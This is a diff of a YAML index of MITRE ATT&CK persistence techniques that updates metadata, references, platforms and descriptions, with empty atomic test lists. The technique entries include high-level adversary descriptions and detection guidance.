-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -31825,7 +32250,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -31914,24 +32338,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -31945,7 +32372,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -31960,6 +32387,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -31973,11 +32405,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32003,7 +32434,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32017,7 +32447,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32044,8 +32473,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32056,7 +32485,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32097,7 +32527,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32117,12 +32547,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32176,11 +32605,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32267,9 +32695,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32282,12 +32710,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32300,9 +32727,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32311,13 +32740,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32365,14 +32794,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32408,16 +32834,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32458,143 +32883,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -32631,7 +33054,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -32657,12 +33080,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -32740,9 +33161,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -32769,7 +33189,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32791,41 +33211,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
